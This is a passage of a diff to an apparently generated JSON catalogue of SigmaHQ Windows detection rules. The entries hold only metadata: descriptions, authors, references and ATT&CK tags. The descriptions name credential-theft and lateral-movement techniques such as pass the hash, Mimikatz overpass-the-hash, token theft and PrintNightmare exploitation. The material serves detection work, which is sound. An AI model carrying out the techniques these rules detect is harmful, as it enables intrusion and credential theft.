- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a",
- "value": "Admin User Remote Logon"
- },
- {
- "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2018/03/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_security_apt_oilrig_mar18.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_oilrig_mar18.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561",
- "value": "OilRig APT Schedule Task Persistence - Security"
- },
- {
- "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527",
- "meta": {
- "author": "INIT_6",
- "creation_date": "2021/07/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/INIT_3/status/1410662463641731075",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675",
- "cve.2021.34527"
- ]
- },
- "related": [
- {
- "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8fe1c584-ee61-444b-be21-e9054b229694",
- "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access"
- },
{
"description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.",
"meta": {
@@ -9955,6 +9136,627 @@
"uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641",
"value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security"
},
+ {
+ "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2022/08/03",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "win_security_diagtrack_eop_default_login_username.yml",
+ "level": "critical",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation"
+ ]
+ },
+ "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196",
+ "value": "DiagTrackEoP Default Login Username"
+ },
+ {
+ "description": "Detects the attack technique pass the hash which is used to move laterally inside the network",
+ "meta": {
+ "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)",
+ "creation_date": "2019/06/14",
+ "falsepositive": [
+ "Administrator activity"
+ ],
+ "filename": "win_security_pass_the_hash_2.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
+ "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
+ "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1550.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b",
+ "value": "Pass the Hash Activity 2"
+ },
+ {
+ "description": "Detects logon events that specify new credentials",
+ "meta": {
+ "author": "Max Altgelt (Nextron Systems)",
+ "creation_date": "2022/04/06",
+ "falsepositive": [
+ "Legitimate remote administration activity"
+ ],
+ "filename": "win_security_susp_logon_newcredentials.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b",
+ "value": "Outgoing Logon with New Credentials"
+ },
+ {
+ "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like",
+ "meta": {
+ "author": "@SBousseaden, Florian Roth",
+ "creation_date": "2022/04/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_susp_krbrelayup.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
+ "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_krbrelayup.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.credential_access"
+ ]
+ },
+ "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b",
+ "value": "KrbRelayUp Attack Pattern"
+ },
+ {
+ "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.",
+ "meta": {
+ "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
+ "creation_date": "2023/01/19",
+ "falsepositive": [
+ "Legitimate or intentional inbound connections from public IP addresses on the SMB port."
+ ],
+ "filename": "win_security_successful_external_remote_smb_login.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
+ "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.credential_access",
+ "attack.t1133",
+ "attack.t1078",
+ "attack.t1110"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "78d5cab4-557e-454f-9fb9-a222bd0d5edc",
+ "value": "External Remote SMB Logon from Public IP"
+ },
+ {
+ "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.",
+ "meta": {
+ "author": "NVISO",
+ "creation_date": "2020/05/06",
+ "falsepositive": [
+ "Legitimate logon attempts over the internet",
+ "IPv4-to-IPv6 mapped IPs"
+ ],
+ "filename": "win_security_susp_failed_logon_source.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.persistence",
+ "attack.t1078",
+ "attack.t1190",
+ "attack.t1133"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1",
+ "value": "Failed Logon From Public IP"
+ },
+ {
+ "description": "RDP login with localhost source address may be a tunnelled login",
+ "meta": {
+ "author": "Thomas Patzke",
+ "creation_date": "2019/01/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_rdp_localhost_login.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "car.2013-07-002",
+ "attack.t1021.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31",
+ "value": "RDP Login from Localhost"
+ },
+ {
+ "description": "Detects activity when a security-enabled global group is deleted",
+ "meta": {
+ "author": "Alexandr Yampolskyi, SOC Prime",
+ "creation_date": "2023/04/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_security_enabled_global_group_deleted.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "b237c54b-0f15-4612-a819-44b735e0de27",
+ "value": "A Security-Enabled Global Group Was Deleted"
+ },
+ {
+ "description": "Detection of logins performed with WMI",
+ "meta": {
+ "author": "Thomas Patzke",
+ "creation_date": "2019/12/04",
+ "falsepositive": [
+ "Monitoring tools",
+ "Legitimate system administration"
+ ],
+ "filename": "win_security_susp_wmi_login.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "5af54681-df95-4c26-854f-2565e13cfab0",
+ "value": "Login with WMI"
+ },
+ {
+ "description": "Detects potential token impersonation and theft. Example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS flag\".",
+ "meta": {
+ "author": "Michaela Adams, Zach Mathis",
+ "creation_date": "2022/11/06",
+ "falsepositive": [
+ "Anti-Virus"
+ ],
+ "filename": "win_security_access_token_abuse.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html",
+ "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1134.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f",
+ "value": "Potential Access Token Abuse"
+ },
+ {
+ "description": "Detects activity when a member is removed from a security-enabled global group",
+ "meta": {
+ "author": "Alexandr Yampolskyi, SOC Prime",
+ "creation_date": "2023/04/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_member_removed_security_enabled_global_group.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "02c39d30-02b5-45d2-b435-8aebfe5a8629",
+ "value": "A Member Was Removed From a Security-Enabled Global Group"
+ },
+ {
+ "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like",
+ "meta": {
+ "author": "@SBousseaden, Florian Roth",
+ "creation_date": "2019/11/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_susp_rottenpotato.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/SBousseaden/status/1195284233729777665",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.credential_access",
+ "attack.t1557.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f",
+ "value": "RottenPotato Like Attack Pattern"
+ },
+ {
+ "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network",
+ "meta": {
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "creation_date": "2020/09/02",
+ "falsepositive": [
+ "SCCM"
+ ],
+ "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.privilege_escalation",
+ "attack.persistence",
+ "attack.t1546.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648",
+ "value": "Remote WMI ActiveScriptEventConsumers"
+ },
+ {
+ "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)",
+ "creation_date": "2019/06/02",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "win_security_rdp_bluekeep_poc_scanner.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/zerosum0x0/CVE-2019-0708",
+ "https://twitter.com/AdamTheAnalyst/status/1134394070045003776",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1210",
+ "car.2013-07-002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "8400629e-79a9-4737-b387-5db940ab2367",
+ "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln"
+ },
+ {
+ "description": "Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.",
+ "meta": {
+ "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
+ "creation_date": "2023/01/19",
+ "falsepositive": [
+ "Legitimate or intentional inbound connections from public IP addresses on the RDP port."
+ ],
+ "filename": "win_security_successful_external_remote_rdp_login.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
+ "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.credential_access",
+ "attack.t1133",
+ "attack.t1078",
+ "attack.t1110"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2",
+ "value": "External Remote RDP Logon from Public IP"
+ },
+ {
+ "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.",
+ "meta": {
+ "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)",
+ "creation_date": "2018/02/12",
+ "falsepositive": [
+ "Runas command-line tool using /netonly parameter"
+ ],
+ "filename": "win_security_overpass_the_hash.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.s0002",
+ "attack.t1550.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87",
+ "value": "Successful Overpass the Hash Attempt"
+ },
+ {
+ "description": "Detects activity when a member is added to a security-enabled global group",
+ "meta": {
+ "author": "Alexandr Yampolskyi, SOC Prime",
+ "creation_date": "2023/04/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_member_added_security_enabled_global_group.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "c43c26be-2e87-46c7-8661-284588c5a53e",
+ "value": "A Member Was Added to a Security-Enabled Global Group"
+ },
+ {
+ "description": "Detect remote login by Administrator user (depending on internal pattern).",
+ "meta": {
+ "author": "juju4",
+ "creation_date": "2017/10/29",
+ "falsepositive": [
+ "Legitimate administrative activity."
+ ],
+ "filename": "win_security_admin_rdp_login.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://car.mitre.org/wiki/CAR-2016-04-005",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1078.001",
+ "attack.t1078.002",
+ "attack.t1078.003",
+ "car.2016-04-005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a",
+ "value": "Admin User Remote Logon"
+ },
{
"description": "Detects common NTLM brute force device names",
"meta": {
@@ -10001,8 +9803,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://goo.gl/PsqrhT",
"https://twitter.com/JohnLaTwC/status/1004895028995477505",
+ "https://goo.gl/PsqrhT",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml"
],
"tags": [
@@ -10070,8 +9872,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://twitter.com/mgreen27/status/1558223256704122882",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml"
],
"tags": [
@@ -10094,8 +9896,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://twitter.com/mgreen27/status/1558223256704122882",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml"
],
"tags": [
@@ -10118,11 +9920,11 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/FlemmingRiis/status/1217147415482060800",
"https://www.youtube.com/watch?v=ebmW42YYveI",
"https://twitter.com/DidierStevens/status/1217533958096924676",
"https://twitter.com/VM_vivisector/status/1217190929330655232",
"https://nullsec.us/windows-event-log-audit-cve/",
+ "https://twitter.com/FlemmingRiis/status/1217147415482060800",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml"
],
"tags": [
@@ -10200,8 +10002,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx",
"https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml"
],
"tags": [
@@ -10221,6 +10023,29 @@
"uuid": "9703792d-fd9a-456d-a672-ff92efe4806a",
"value": "Backup Catalog Deleted"
},
+ {
+ "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/21",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_msmq_corrupted_packet.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msmq/win_msmq_corrupted_packet.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "ae94b10d-fee9-4767-82bb-439b309d5a27",
+ "value": "MSMQ Corrupted Packet Encountered"
+ },
{
"description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine",
"meta": {
@@ -10234,8 +10059,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://technet.microsoft.com/en-us/library/security/4022344",
+ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml"
],
"tags": [
@@ -10276,8 +10101,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://technet.microsoft.com/en-us/library/security/4022344",
+ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_application_msmpeng_crash_error.yml"
],
"tags": [
@@ -10387,8 +10212,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies",
"https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv",
+ "https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml"
],
"tags": [
@@ -10421,9 +10246,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
